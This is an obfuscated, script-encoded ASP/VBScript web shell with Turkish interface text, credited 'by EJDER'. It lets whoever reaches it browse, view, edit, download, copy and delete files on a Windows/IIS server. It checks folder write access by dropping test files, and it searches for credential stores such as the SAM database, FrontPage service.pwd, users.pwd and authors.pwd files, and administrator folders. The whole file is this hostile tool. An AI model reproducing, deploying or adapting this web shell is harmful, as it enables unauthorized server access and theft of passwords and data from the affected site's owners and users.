m^km0'rE3^ldWM3G2Hl`D4kkRtMnW#pDY;DU~6ls/IJr@**@!Jl@*@!C,YrY^n{JE,fK/XmPz[PLPoWM:CO,f+ğbşOkMPJr~4D0{BE[or^+KlD4[rghG9+'qL0rVxr[dD7E`b#LE[b/s+s'E'k+D7;`b#[r'VW	Es'E[oG^NnDhCY4[E':k:nxr[OksnLJv,W	mVbm0xJr3slkW.VKwXmcY4k/c4.+6#pDnY;.	PWl^d+pJE@*Q@!zC@*@!zWW	O@*J@#@&XmyWMYmcJ@!l~YbYsn{JJ,İçrxbPMöMüUOüV:3~kçrU,KıVVm~JrP4.0'vELsrVKmY4LJQ:W9+{1[6ks+{J'dD\!ck*[JLVGx!:{J'sGs9+.nmOtLJ'Pb:+xELYr:'rB@*r[k+D7Evr#LJ@!zm@*@!&(@*P@!WW	YP6C^+{hbxLNrUT/~/b"+{c@*±~@!lPOrDVn'rE,fGkXmXıPANbOV:n3,kçrU,Kı3^CP(XPAB92"P=#~JE~4Dn0{vJLsrsnlO4LJ_:K['qZ[6kV'r'/D-Evkb'r[Kbh+{J[Drh+LJL3Gx;h{J'sKsNDKCDt[Ev@*"@!zm@*r[[Kh	?YM[r@!z6WUY@*Jb@#@&L'NQF@#@&+	[~k6@#@&xn6O@#@&kWPN~',!~O4+x@#@&Hl"WMOm`E@!mxYD@*@!0KxOP1WsGM'aw3Gz%c@*~@!0KxDPWl^n{rxT[k	od~kkynxl@*H@!JWKxO@*P"+:KY~W^l.l0PjG	EçP(;V!xlsC[ıR,MVrş:rş~mDC:mzıPk+çrUbyR~@!6WUY,Wmmn{bxo9k	L/,/ry'X@*g@!z6GxD@*P@!&WW	Y@*Jb@#@&n	N~k6@#@&k+.-!0Ws[D~',CMDCH`rZ)'nMGoMlhPwksnk-?.\ jJBE/)JnMWLDCh,srVdzV+Un+PsPK,?nD7nMz]:KY+zNsrxr~EZ=zK.KoDmhPwkVd&Mxv~sPK,?nD7nDJb^^KExOdJCnVs~wKK,jk+Dkz!d+M/E#@#@&WGMPk{TPDWPy@#@&sKV9+.2arkYa`knD7EWG^N+.cb#b@#@&U6O@#@&AxN,?!8@#@&@#@&?!4~3NN+MKV/3"nhWD+v#@#@&%xZ@#@&w^n/0Px~mDDCzvJ^)JKMWLMlsPsbVdzUdW6Y&K^+/0&HH?pd&9lDlJ:z/5sr~Em=&nMWL.m:Por^+dzU	kWWDzhV+k3rSJ1)&nMWL.m:PwrV/zU	dW6YJns+dVJHz?5JzGlOCJw/CEBJ^)JKMWLMlsPsbVdzUdW6Y&K^+/0&fmYl(Cd+kztXjpJ&GlOlJhXk;sEBJmlwhDGoMCsPobV/-khkG0D-CED/C-c/l7E#@#@&0K.~k{!,YGPf@#@&kWPwjrcsGs9+D3ab/O/v2^+d0`b##,Y4nx@#@&zl.W.Om`J@!WW	YP1sC/k'rJVFEE@*@!CPDrY^+xErPfr"bxrPnGaXC^l,[P:lşı,EJ,t.+6'vELsk^nnmYtLE_:KN'+[VG	Eh'r'w^+dVvk#'ELKr:xr[Ob:[JEPKUm^k^3{JEV^l/K.3KwXmcOtb/ct.+WbpDnY!.x,0Csk+iEE@*c@!zm@*@!zWKxD@*P@!0KUY,mslk/xEr3FrE@*@!lP,OrY^+{JEP9r.kUk,jk^PEE,tDnW{BE[wr^+KmY4[JQ:K[+{c'3Kx;h{J[as+k3`bb'JLNVxJ'2^+d3vr#LJ'Pb:+xELYr:'rB@*û@!zm@*P8@!JWW	Y@*@!6WUO,/k.n'y@*@!(@*@!l,YbYs+xErP9k.rxbx~rçbx+~!bD~Jr~4Dn6'EJ[wk^nnmY4[rgVG	E:{E[aV+kVck*[r[Pkhn{J'Ybh+LJv@*r[wsnk3ck*'r@!&m@*@!z4@*J*@#@&N'%_8@#@&n	NPbW@#@&x+XO@#@&b0,L~'~T,Y4+	@#@&Hl"GMYlcE@!mnxDnM@*@!6W	YP1W^GD{ao2Fb0*@*P@!6GxDP0m^n'qk	o[kULkPdk.n'l@*H@!J0WUO@*PE[as/Vv!*[J,\~JLws+k3cq*[J,[k.kx^n.k,4!V;xChmNı P@!WW	Y~Wmm+x	bxLNbUT/~kk.+'l@*g@!z6WUY@*P@!&6WxD@*J*@#@&U[Pb0@#@&r0~oUr sbs+A6rdD/`2s/V`Wb*PO4+	@#@&9WSU?DD~',J@!C,YkDs+{JJGGdXmXı,?rVEE,t.+6xBr[or^+nCO4[EgsG9+xl[0Wx!:{E[wWsNDKCDt[r'NV'r'oW^NDKlO4LJwJLd+M\;cb#[E':kh+{ELYrs+LJB@*û@!JC@*@!0GxDPWC1+'Sn49kxTd@*@!mPDkOVnxrJ~fKAx^WC[,+Y~ErP4DW{BELsbV+hlD4[rghW9+xL0k^n'r[/.-Evk*[E[VG	Eh'r'sKV[nMnlO4LJ'Kbh'ELYb:+LJE@*Í@!Jl@*@!J0GUD@*@!6GxDP0m^n'Sk	o[kULk@*@!l,OkDVnxrJP9GkXCXı,FKwzmVmP[,Kmşı~JrP4D0xvr[sbs+hlY4'EgsW9+xG'WbVn'r'/D-;vk#'ELKr:xr[Ob:[JEPKUm^k^3{JEV^l/K.3KwXmcOtb/ct.+WbpDnY!.x,0Csk+iEE@*c@!zm@*@!l~DkDV+{Jr~fK/zl,b[~LPsK.:mYPGnğrşYbD,JEP4.0xBr'sbVnKmYt'EQ:GNx8v'6k^+'r[knD7Eck*[E'b/Vh'r[/.-Evk*[E[VG	Eh'r'sKV[nMnlO4LJ'Kbh'ELYb:+LJE~W	msk13xEr3VmdWM3WazC`Dtb/ t.n6#IDOEMx~WmV/nIrJ@*g@!&m@*@!J0KxY@*J@#@&XmyGDDlcE@!lPDrY^+'rE~İçk	k,Mö.üxOüs:n3,rçk	PPıV^lPEE,t.+6xEJ'wk^+nmY4'JQ:GN'1'6kVxJL/+M-;`b#LJ'3GU!:xJLoW^Nn.hlY4'r[Pksn{J'Dks+[rB@*E[k+.\!`rbLJ@!JC@*@!z4@*~@!0KxDPWl^n{hrxT[k	od~kkynxW@*±~@!m~DkO^+{JJ,fKdXmXı~29kOs:+0~kçbxP:ıVsl,4HP3993"Pl#,EJ,t.n6'BE'wks+hCDt'rgsWN'8T[6ks+{J'dD\!ck*[JLPr:'r[OkhnLJ'3KUEs'E'wWV[nMnCY4'rB@*e@!Jl@*r[9Gh	?ODLJ@!&6WxD@*J*@#@&sd+@#@&Hl"W.Om`E@!1nxD+.@*@!0WUO,mGVK.{aoAGz%c@*P@!WW	Y~0mmnxqkxT[k	o/,dry'l@*H@!&WKxO@*,KV/VvbxP~)!Ydl7 kl-,fK/Xm/ı,8E^EUlsl[ı ,@!0KUY,0l1nxbxTNrxLd,/ryx*@*1@!&6WxO@*,@!&0KUD@*E*@#@&+x9PbWP@#@&3x9Pj;(@#@&@#@&?!4PA%[+M?m:c#@#@&i2.DcHEs4n.{!@#@&7Kx~+M.KD~M+kE:P	n6D@#@&dU+O~tXsbs+,'Pwj6R;DlO+PnXYok^n`rZl^Kx0rL'Yn/D L[Dr~P:D!n#@#@&7HHsrsRhMrYPJ,3%ND,C/~uDnRc P{#~E@#@&ddnDP\Xwr^+~{PgWY4k	L@#@&dr0,2..c1Es8+MP@!@*~TPDtx@#@&77M+dwKU/RA.bY+~E@!mnxDnM@*'	4kwi@!4@*@!0KxOP1WsGM'aw$28fG@*eCy,)@!zWWUO@*@!&4@*~@!6WUO,mWsGM':sA{z%*,m^l/k'rE38JE@*û@!zWG	Y@*LU4kwir@#@&dVk+@#@&77M+dwKU/RA.bY+~E@!mnxDnM@*'	4kwi@!4@*@!0KxOP1WsGM'aw)sAf2@*eCy,)@!zWWUO@*@!&4@*~@!6WUO,mWsGM':Z+o;A3,m^l/k'rE38JE@*ü@!zWG	Y@*LU4kwir@#@&dx9Pr0@#@&i2.DcHEs4n.{!@#@&7Kx~+M.KD~M+kE:P	n6D@#@&dw?6 G+VO+wkV~EZ=mKxWkLwD+dYcnL9+.EBYD;n@#@&7k6~AD.c1!:4D,@!@*,!~Y4+U@#@&ddMn/aWxkn hMkD+~J'U(/2i@!8@*@!0GUDPmGsKDxaw$AF9F@*UkV,)@!&0KxO@*@!z8@*,@!0KUY,mW^G.'[sAG)%*~1VC/kxJr3qEr@*û@!&WKxO@*LU(/2p@!Jm+	Y.@*r@#@&dVdn@#@&di.+kwW	dnRSDbYnPE'	4dwp@!4@*@!WG	YP^G^W.'[ozs3G2@*?k^P=@!z6WUY@*@!&8@*P@!6GxDPmKsGD{a;voZ$3,mslkd'rJVqrJ@*ü@!&6WUY@*'	4dai@!zmxDnD@*J@#@&i+U[,k0@#@&dKxP..WMPM+dEhn,xn6D@#@&iE.s,'PE/=mGx6rT-E@#@&,PP,?OP6PxPw?6 V+YwGV9+Dv;.V*@#@&P~P~r6PnDM~@!@*PT~Dt+U@#@&P~Pi;MV~{PrZ)'&Hf}j-kXdO:&ywmKx0bLwJ@#@&,P~PjnDPWP{~sUr !YsGs9+.`!.^#@#@&P,PPx9~k6@#@&P,P~@#@&PP,~?YP6^~',0csrVnd@#@&~P,~sKD~3mmt~W8P(x,W1@#@&,P,PP,P9Gh	?OD,'~E@!lPDrY^+'rE9WkXmXı~?rsrJ~tMn0{BE'wkVnKmY4[r_sW['l[3Kx!h'r[;D^[E'9+V{E[!DVLEE[6FcxC:n'r[Pksn'r[Ors+[Ev@*û@!&l@*@!6WUDP6lm'Sn49kUok@*@!C,YkDs+{JJ,9Gh	VKl[PnO,JEP4.+6'vELsksnhlOtLEQ:G9+{v[6k^n'r[;D^[EEL0FcUls+[r'VW	Es'E[;.^[E[:r:'E'Dk:n'rB@*Í@!JC@*@!&6W	Y@*@!0KUY,0Cm'Ar	oNbUok@*@!m~OkDV'EJ~9K/zlHı~|KwzC^lP'~:lşı~Jr~4Dn6'EJ[wk^nnmY4[rghG9+'F'0bV+{E'EMVLJE[WqcxC:'JLKrh'J'Ob:n[rv,WU1Vbm3{JrVVm/GD0W2zm`Y4r/ctDWbiM+DE.x~WmVd+pEJ@*c@!&m@*@!C~DkOVxrJ~GWkXl,b9~[,sGDslO~G+ğkşDrD,JJ,4.+6'EJ'srsnCY4'JQ:G['F'6ks+{ELE.^[rJ[6FcUls+'JLkds:'r'08Rxmhn[r[0WUEhxr[oW^[+MnCO4[J'Pb:n'r'Dkh[rBPKx1sk13xJr3sCkWD0GwHl`D4r/ctM+W#I.Y;D	~0mVdnpJJ@*_@!zC@*@!&6WUD@*r@#@&,P,~P,Pzl.W.Om`J@!CPDkY^nxJrPİçbxrP!ö.ü	Yüs+sn3,kçrU,Kı3sC,JEP4.0xEJLsk^+hCY4[EgsW[n{,[6rV'JL;.VLJr[WF Hm:n[r'3Kx;h{J[;.^[E[:rs+xr[Dk:[rv@*r[WFcxCh[J,,@!6WxD~^W^WM'z+ssKh@*JLoWM:COgE:8nM`WFcdbynB!*[J@!z6GxD@*DJLJ@!&m@*@!J8@*,@!0KUOP6l1+xhrUTNrxTdPkk"n{c@*±~@!mPOkDs'ErPGW/HlHı~29kOV:nV,kçk	~Kı0Vl,8zPA9G2]Plb,JEP4.+6'vELsksnhlOtLEQ:G9+{F!L0bs+{J'EMV'Er[08 xm:+LE'Kb:'E[Ors+'JLVW	Ehxr[E.sLJv@*e@!Jl@*r[9Wh	?D.[r@!&0KxO@*r#@#@&~P,P1aO@#@&+	N~?;8@#@&@#@&U;4,2%[D.Or|n-Yvb@#@&7N'Z@#@&iVK^l^PxPM+5;/Ycd+M\+M-CDbl(Vn/cEznKS|KCI?(/zS{K):CE#@#@&i\ObP{PlMDmz`rJ'VKmCsLJ-|-Yb{w7Owl1m/dR^U6JSJr'VKmCsLJ-  '{-Ybma\O'l1m+k/c^x6JSJr[sG1lVLE-cR-c w{7Yb{2\Owmm^+kdR1xWEBJJ'sKmCVLE'R 'Rc-Rc-|-Yb{2\D-C^1+/k m	0JBEE[^W1ls[Ew|\Ok|2\D-2GkYkUWKR4Yssr~Er[^WmmVLE-cRw{7Yrma\Y'2WkYk	WGR4YsVE~EELVGmms[r-  'RRwm7Yr{a-D-2K/Dkx6Wc4YsVE~rJ'sKml^'J'RR'  -cR'{-Yrma\O-aG/DkUWKRtOh^JSJr'^W^mVLJ-7Ybmw7Y&/D-r1+RaANr~Jr'sW1l^[E-  '\Ok|2\DzdnM\k^ncwANrSrJ'^W1lVLJ' R'R -7Yrma\YJd+M\k1n wSNr~EJ'sKmCVLE-cRw c-R w7Yr{a-DzdD7kmRaANr~EJLVG^mV[r&\Dk{a-Oz!/DdR2A9JSJr'VKmCsLJz  J\Ok|27Y&!/D/cwS[JBJE[^W^C^[JJ RJRRJ-Ok|w7Y&EdnM/ wS[JBJE'^WmCsLJ&Rc&cR&cRJ\Yb{a-YJEd+M/ 2SNJBEJLVW1Cs[rz7Yr{2-DzCED4WM/ 2SNJSEr[sW1C^[EJRcz\Dk|2\DzCEDtG.kRwS[JBJJLsGmmVLJ&R &cR&\Dr{a\O&mEY4GM/ wS[r~Er[^WmmVLEzcR&Rcz  J\Ybmw7Yzm;OtKDkR2h[E*@#@&diWWMPrxZPYG~8,@#@&i7b0~w?}RsbV36b/O/v\Orvk#*~Y4+x@#@&7diNKhU?O.,'~J@!CPDkOs'JE9K/zlHı~UksrJ,tD0{vJLsrVnCO4[JQhW9+'l'VW	Es'E[oG^NnDhCY4[E'9+VxELsGV9nMnCDtLJ-r[7Okvkb[r[Prs+'r'Yb:+LEv@*û@!zm@*@!0GUDPWl1n'S+8[bxod@*@!l~YbO^+xrJ,fWSx^Gl9PnY,JE~4D+6xBr[sbsnnmY4[EghG9+xvLWk^+xEL\Yrcb#'JLVKx;s'r[sKV9nDhlOtLJ'Pb:+{E[Dk:'EB@*Í@!Jl@*@!&WKxO@*@!WW	Y~Wmm+xAbxLNbUT/@*@!l,YkDVxJrP9WkXCzı,|Wazl^lPL~Plşı,JrP4DnW{BE[wrVnCO4[J_hKNn'F'6ks'r[\Dkvr#LJ'Kb:nxr[Ybh+LJB,GUm^k13xJEV^ldWMVWaXCcDtkd 4Dn0*IM+O!D	P0mVknirJ@*c@!zC@*@!lPDrY^+'rE~fK/Hl~b[~LPoWMhlDP9nğbşYk.~rJ~tMn6'vr[wkVnmOtLJ_:KNnx8v[6rV'JL-Okvk*[E[rd^+h'r'\Dkcr*[J'VKx;:{ELsG^NDnmY4'JLKr:'E'Dk:'JEPW	^sk13{JE3sCkW.3K2Xm`O4b/R4.0biMnDE.	P6lVk+pEJ@*g@!zm@*@!&6WxD@*J@#@&di7zl.WMYC`E@!mPOkDs+{JE~İçbxk~!öMüxOüVh3~bçk	PKı0Vm~JrP4D0xvr[sbs+hlY4'EgsW9+x,'WbVn'r'\Dkcr*[J'VKx;:{ELsG^NDnmY4'JLKr:'E'Dk:'JE@*JL-Okvk*[E@!&C@*@!&4@*~@!6WUO,0l^n{hrxT[bxLkPkky'W@*±P@!l~YbYsn{JJ,9WkXlHı~3NbY^+h+V~bçkUP:ıVVmP8z,2993"Pl#,ErP4M+6'Br[wrVnCY4[E_sWNxFZ[0bsn'r[7Yr`rbLJ'Kbh+{J'Ob:+'EL3Gx!h{J'wW^N+MnmOtLJv@*e@!&C@*J[9Gh	?YM'E@!J0KxO@*Eb@#@&7di%'N_q@#@&ddnU9Pr0@#@&ixnXY@#@&db0,%P{PTPDtnU@#@&dizl.WDDCcJ@!mxO+.@*@!0GxD~mKVG.{as3{z%*@*,@!6WUDP6lm'qrxTNrxT/~dby+{X@*g@!z6GUY@*PUWUEç~8!V;xmhl9ıR~9mtl~LxrşPz.m:C,Xmwıx,4H~2xf3I,@!WG	YP6Cm'bULNbxT/~/r"'X@*g@!z6WUO@*P@!&WKxO@*rb@#@&7x9Pk6@#@&nx9PdE(@#@&@#@&?E(~2NN+MHPjk+M`GY;.!:b@#@&7L{!@#@&ixY;dD~',CMDCH`rm)'NK^Es+UYkPCU9P/OYbxokwE[KY!D;:'E'1PjU3Icf)Pr~J^l'NGm!hxOkPmxN,/OYbxL/'b[hbxkkODmYWMwHK`?AI f)Pr~Em=wNKm;hxYd~mx[PknDYr	ok-JLWD;D!:'J'xO;k+Dc[lDRVKLE~rm=-[W^;s+UYk~l	N~dYYrUT/wb9hbxrkYMlYKD'UY!/nDcNCOcVWTE~rm)'[Gm!:xO/~C	N~/OYbxLd'J[GO!D;:LE'xO!/DRbxbE~rml-9W^;s+xDdPmxN,dnYDk	od-)[skUkkODmYG.'xY;dD k	rr#@#@&d6WD,k{TPDW~*@#@&77b0Pwjrcsk^n36b/D/cxO;k+.`bb#,Y4n	@#@&77iNGh	jDD~{Pr@!l,YbOV'EJGWdzmXıPUrVrJP4.n0{Br[oksnhlOtLEgsW[n{*[VG	Eh'r'wWs9+MnlDtLE[9+s'r[oG^N+MKlDt[rwE[	Y!/nDcr*[E[:r:'E'Dk:n'rB@*û@!JC@*@!WKxDP0mmxh4[k	od@*@!lPDrY^+'rE~fKh	VGl[~Y~Jr~tM+WxEJ[or^+KlD4LJ_sW9+'+[6rV'E[	Y;dD`bb[r[3KU;:{JLsGV[nMnCY4'JLKrh'J'Ob:n[rv@*Í@!&m@*@!z0KxD@*@!6WUY,0C^'hbUo9kxTd@*@!mPDkOVnxrJ~fKdXmXı~FKwXCsmP'P:Cşı,JE,tM+0{Br'sbVnnmY4'rg:K[+{G[6rs+{JLxOEdnM`r#LE[:khn{J[Ors+'JE~Kx^^k13'rJ0slkW.3KwzCvYtbdR4D+6bIDY!DUPWC^/nirE@*W@!&C@*@!l~ObYs+{ErP9K/HlPzN,'PwW.:mY~9ğkşYb.PrJP4.n0{Br[oksnhlOtLEgsW[n{Fv'WbVn'r'	Y;k+M`k*[r'kkVn:{J'UDE/.`b#[r'VW	Es'E[oG^NnDhCY4[E':k:nxr[OksnLJv,W	mVbm0xJr3slkW.VKwXmcY4k/c4.+6#pDnY;.	PWl^d+pJE@*Q@!zC@*@!zWW	O@*J@#@&didXmyK.Ym`E@!mPOrDV+{EJ,İçkxb~!öDü	Yü^+h+V~bçkUP:ıVVmPEE,tDnW{BE[wr^+KmY4[JQ:K[+{,'0bVnxr[xD;/D`bb'JL3Kx;:xELsGV9nDhlO4LJ[Prs+xJLOb:nLJE@*JLxD;/Dck*[E@!Jl@*@!&4@*P@!6GUY,0mmn'Ar	o[k	L/,/r"'c@*±~@!l~YbO^+xrJ,fWkXmzıPANrY^+hn0PkçbUP:ı3Vm~8X,2xf3I~l*PEJ,4D0xvr[srsnCY4'rghKN'FZ[6rV'E[	Y;dD`bb[r[Kbhn'r[Dkh+'EL3Gx!h'r[oG^N+.KmY4[rv@*"@!Jl@*J[9WSU?DD'J@!zWG	Y@*rb@#@&ddi%xL3F@#@&7dnU9Pr0@#@&d	+aO@#@&drW,L~',T,Y4x@#@&diXm"WMYC`r@!^n	Y+M@*@!6WxD~^W^WM':s3{z%*@*,@!0KxO~6lmnxqkUo9r	od,/by+{*@*H@!J0GxD@*~jKxEç,8E^ExmhCNıcPGl4l~LxrşPz.lsl~zmwıx~8HP39G3"P@!6W	YP6l1n'qkUo9kULkP/b"+{*@*g@!&0KxD@*~@!&WKxO@*rb@#@&dnU9PkW@#@&+UN,d!4@#@&@#@&?E(PA%ND]+alr.v#@#@&72MDRg;h4D{!@#@&7G	PnDMGD,Dnd!:+~U6O@#@&7U+O,HHsk^+,xPw?6R;DnCD+KaYwkVcEm=Rc-.+2CbDwYdYc+%[DJS~:D;+*@#@&d\HsbV+chMrYPEPAL[nMPmdP_+D  R,'*PE@#@&7k+OPtzsbVn~{P1GO4kUo@#@&ikW,2MDRgEs8+MP@!@*,!~O4+x@#@&diD+k2Gxk+ch.kOn,J@!mUYD@*'	4/2I@!4@*@!6G	Y~1W^WD{aw$28f{@*Il"~=@!z6GxD@*@!J8@*P@!0KxOP^G^W.'[o2Fb0*,mVCdk'EJ0qrJ@*û@!z6WxD@*LU4kwIJ@#@&7n^/+@#@&diD+k2Gxk+ch.kOn,J@!mUYD@*'	4/2I@!4@*@!6G	Y~1W^WD{aw)sAf3@*Il"~=@!z6GxD@*@!J8@*P@!0KxOP^G^W.'[/vwZ$3,mVCdk'EJ0qrJ@*ü@!z6WxD@*LU4kwIJ@#@&7n	NPbW@#@&d2M. 1!:(+.'T@#@&dGx,nDMW.~M+/;hPU+XO@#@&7w?}RfVO+wks+,J^lcR-MnwmkD'On/DRL[+.EBY.E@#@&ikW~ADD H!:8+M~@!@*~ZPDt+	@#@&7dM+dwKxdnchDbO+,J[	8dwp@!(@*@!0GUDP^W^GD{ao$AFf{@*UksP=@!J0G	Y@*@!z(@*,@!0KxOP1WsGM'aw3Gz%c,^slk/{JE3qEr@*û@!z6GxD@*'U(/wI@!JmnxDnM@*E@#@&i+Vk+@#@&diDn/aWUdRhMrYPJLU8/ai@!4@*@!WG	Y~mKsWM':ozs293@*?rV,l@!zWKxD@*@!J4@*~@!6WUY,mGsKD'[/vwZAA~^Vm/k'EJVqrJ@*ü@!JWW	Y@*'	4/2I@!z^+	OD@*r@#@&d+	N,r0@#@&7W	Pn.MWD,.+kE:~U+XY@#@&7E.s,'~J1lRc-.nalk.wr@#@&P,~,?nDP6P',sU6RV+OsKV[nM`EMs#@#@&P,~~k6PD.P@!@*,!~Y4nx@#@&~~,dE.s,'~J;l'(gf}?'D2lbDwJ@#@&~~,P?OP6P',ojrcMYoWs[DcEMs#@#@&~~,P+U[,kW@#@&~,P~@#@&,PP,?OP6m~',0 obV+k@#@&,PP,oGD,2mm4PWq,qUP6^@#@&P~~,PP~[KhU?D.,'~r@!mPYbY^n'rJ9WkXCzı,?k^EJ,tDWxBr[wks+KCDt'JQhW9+xXL3WU;s'E[!.^[ELNV'r[!.VLJE[6F Um:+LE[:k:xE[Dks+'Jv@*û@!zC@*@!WW	Y~Wmm+xA4[k	Lk@*@!mPDkY^+{EJ,fGh	VGC9P+D~JrPtMnW'EJLsrVnKmY4[r_:KNnx+[0rs'E[!.^[Er[6FR	lsn[r[VW	Ehxr[EMs[r[Kbhn'r[Dkh+'EE@*Í@!zm@*@!J0GUD@*@!WG	Y~0m^'AbxTNk	ok@*@!mPOkDVnxrJPGG/HlXı,FGwHl^l~[~PmşıPEJ,4D0xvr[srsnCY4'rghKN'GL0bs+{J'EMV'Er[08 xm:+LE'Kb:'E[Ors+'JE~W	msr13'EE0VC/K.0W2HlvYtb/c4D0biM+O;MxP6CVk+irE@*c@!zm@*@!l~ObYs+{EJ,fGdHlP)[,[~sK.slO,fğkşYbD,EJ,t.+6'vELsk^nnmYtLE_:KN'qv'WbVn'r'EMV'Er[0q 	lh+LELkd^+s'JL08 xm:n[r[VG	E:{E[wWV9n.nmY4[E[Prs+xJLOks+'EEPWU^^k^3{Er3sm/KD3KwHC`Dtr/ct.n6#iMnY!Dx,WCVk+pJE@*_@!Jl@*@!JWW	Y@*E@#@&P~~,P~PHC.W.DlvJ@!mPDrY^+xJrPİçrUbPMöMüUYü^+:V~kçbx,KıVVC~rJ~tMn0{BE'wkVnKmY4[r_sW['O[0bVxJLE.VLJE'6FRgC:[JLVGx!:{J'E.sLJ'Kbh+{J'Ob:+'EE@*E[6qcxCs+LJP]@!6GxDP^W^W.xH+V^Gh@*J[wG.:mYgEh4n.v0qRkry~TbLJ@!&WKxO@*YELJ@!Jl@*@!z(@*,@!0KxOP6l^n{hk	LNbxok~dk.+{c@*±P@!C,YrY^n'rJ~9K/XCzı,2[kDs:n0Pbçkx,Kı0sl,4zPA993"P)*~JrPtMnW'EJLsrVnKmY4[r_:KNnx8![Wr^+xJL;MV'rJL0Fcxmh+LJ'Kb:nxr[Ybh+LJ[0GUEs'r[;Ds'rB@*"@!&l@*J'[KhxjOM[E@!JWKxO@*J*@#@&,P,~16O@#@&+U[,?E(@#@&@#@&s!U^YbW	PVW[G^EdY!.`mDCsb3#@#@&EP8+^rMYrDkb:PmDmsı39l~3KN~G^EşY!;XKDEM;hR,!8aTF:T8aTF[~4mşVCUTıçPkrçr	P8X,3xf3"@#@&dNb:,^W9kUo@#@&7^KNk	LP{PJr@#@&d6WMPr'q~DW~Z&UYvl.C^k3b@#@&d7mK[bxL,',mW9k	LP3PE!8aE@#@&dxaY@#@&d0G[W^EkY;D~x,mGNbUo@#@&3U9Ps;U1YrW	@#@&@#@&wE	mYbW	~NbyrW^EdO!D`*@#@&EP?çrs+	P;tCDdnDPs+MrP(E.[mP4r.^+şOkMrHW.!:,4X,2x92"@#@&dGkh~9kyb@#@&iNk.rxJr@#@&dr0~UKY~38~',JE~Dt+U~9k"k,x,Nr.k,[P0lMC3D+.F@#@&7r6PxKOP0 P{~EJ,Y4+UP[r.k~',[k.k~',3l.C0YnDy@#@&dr6P	WY,32~',JEPDtnU,Nk.rP{PNb"rPLP0l.lVODf@#@&7k6PUGDP3*~{PEJ,O4+U,Nbyk,',[k.k~[,3C.m3Y.c@#@&d9r"kKV!/OE.~{P[k.r@#@&2U[,sEU^DkGx@#@&@#@&o!x1YkKx,jk6DnXmDCOvmW9n6BlDmsr3BNbyr6b@#@&B~?DrD	o~VKNEU;,/CğNmU,çöyüh^+H+D3,Şr0M+~XmDCOıHWD,8X,2Lp93I@#@&iNr:~4m/4@#@&7Nb:~db0Dn@#@&d4lk4{JE@#@&i/k6DxJr@#@&db'/(	Y`m.l^k3*@#@&dGW,4ksn,k@*!,@#@&id4CktPx~;qUYv\bNc1W9+6B`vrO8#M&*_qSy##,~B,?lğ9CUPklHıVCDı~C^ıXGDc@#@&iddr6D+~x,HrNv[byrX~4l/4~8bPLPdk6Dn@#@&dk{rO8@#@&iJGWaP@#@&7?rWM+zlMCY,'~db0Dn@#@&2UN,o!x^DkKx@#@&@#@&oE	mOkKx~jKxDmVkzNksc^W9+X~CDCsb3SNb"kX#@#@&EP/GUMlVk,C9ı:C,tmyıD^ı3,^W9+[P(X~3xf2"~i*@#@&GrhP4lkt@#@&4Ckt~',EJ@#@&rU1D+hn	Yx!@#@&TW;a'Z@#@&4lk4k	o~',JE@#@&k';(xD`lMCsk0#@#@&9W~	4ks+,r@*ZP@#@&4l/4~{P/q	OvHr9`1WN6Bc`bOq#C&bQ8~ *bP,BPUCğ[l	PklzıVC.ı,lsıXK.R@#@&v~;lD.z,W;Y,ı~9kğnbD	+PTkMrşPHl2Pbx^.:+	OPDt+,Un6DPKxn@#@&r6P4lk4P{@*~Jx`[r.ka#,O4+U,@#@&dk	mMn:xOP{Pq@#@&dtmdt,'P8@#@&+^/Pr0~r	m.+snxDPx~8PY4n	@#@&d4Ckt~{P4l/4_8@#@&ikUmM+hn	YP{~!@#@&+	[~k6P@#@&nx[~b0@#@&E~+ğD~CMlF~4mxnV0r,şkWM+^+:P(rYDk~kk+~[bğ+kMU+,ı3lsdı~oD3~l.C8_Q@#@&r0,k~x,FP)HGP4lk4@*'~d+	`Nbyba# F~Y4+U~TWEaxF@#@&B,$.ED+,4rYrşr	k~oökO+MkrzKDEh ,@#@&k6~bPx,Z&xYvlMCVb3bPz19~4l/4@*',S+	c[k.kX#~bH9,l.l8~',l.CyPY4n	PL+Dn	Nx8P,PBEB,$I`K3Pçı0ışıP8rDYkğbUk,lxmsızWMEs:~P!3:2Hf,xF,"ZZe""ZZe"Z"e@#@&B~4lktPbP(rD,/GxMlVr,lNısCP4lyıMsC@#@&k6PrPx~;qUYvCDmVrV*PY4n	P4lk4,'~4lktP3P8@#@&EXnxbP4CktP	;:mDlkı~GV!şY!D@#@&rW,tC/4~@!8!~O4+x~4m/4P{~r!E,[,tlkt@#@&tm/4k	o~x,tlk4PLJar~'P4lktrxL@#@&kxk q@#@&SGGaP@#@&^KNrxT~{P4m/4kxTP@#@&B,+ğnD0k~LKEw,xF,YtU~tmxPCYsC,\nPHnxbPdObD+L~KVş;Y!.@#@&r6PTWEaP{~F,Y4+	P@#@&imW9rxTP',EE@#@&dmDCF~x,Z(xDclMlsr0#PQ~8@#@&d6GMP%{F,YW,lMCF@#@&7d1W[r	oP{~mKNk	L~_,JZF:J@#@&ixn6D@#@&x[~b0@#@&jKx.l0rzNrsP{PmKNbUo@#@&3x9Po;	mYbGx@#@&@#@&j;4,ZKWVXC"v/OD8S/DD+SkYDfb@#@&7k6~	WO,/DD&,',EJ,Y4+	@#@&7iD+k2W	/+c^GW0k/c/O.8#cJkODyJb~{P/O.2@#@&di./2Kxk+R1WKVk/c/DDqbc+6arD/P{~UWS_8!T@#@&7i/n/krW	`EdmXJb~{P/q	Ov/nk/bWxvJkCXr#bP3Pq@#@&d+	[Pb0@#@&3UN,?!4@#@&j;(Pulk4sKEU[N`dOMFS/D.y#@#@&db0P	WD~D;;+kY ^KW3bn/v/YMqb`r/b0.+Eb,'~Jr~Y4+U@#@&ddzC./GVvE@!4@*~E^Ex9E=~JLDn;!+dOcmWKVk/`kO.F*`kY. b'rP~O@*@*Pr[.n$E+dOcmGW0r/ckYMF#vJkr0M+E#LJ~@!J4@*rb@#@&ddbU%+1Y2PxP/(	Yck	%+1Yfb,_Pq@#@&dnx9~b0@#@&2	NPUE(@#@&UE8P4ld4H+/vdYMF~kO. B:9*a~2A9#@#@&ir0,xGO,D+5;/OR1GK3r/v/YMF*c/DD+#,'~ErPbg9P`ZbU3cD;!+dY ^KWVkd`kY.q*`/O.y#bP{~sNXXPDt+	@#@&7dHl"/KVcE~jSGiE!EE!;;E!E!E;E;~rP'PaAN,[~E,OP~E,[~D5!+dDR1WW0kd`kY.F*`dOM #LEJ*@#@&i7.+kwKxd+ ^KWVkd`kY.q*`Jdr6DnJ*~{P2SN@#@&dx9~k6@#@&2	N~j!4@#@&jE(PosLkD@#@&d.+d2Kxd+c	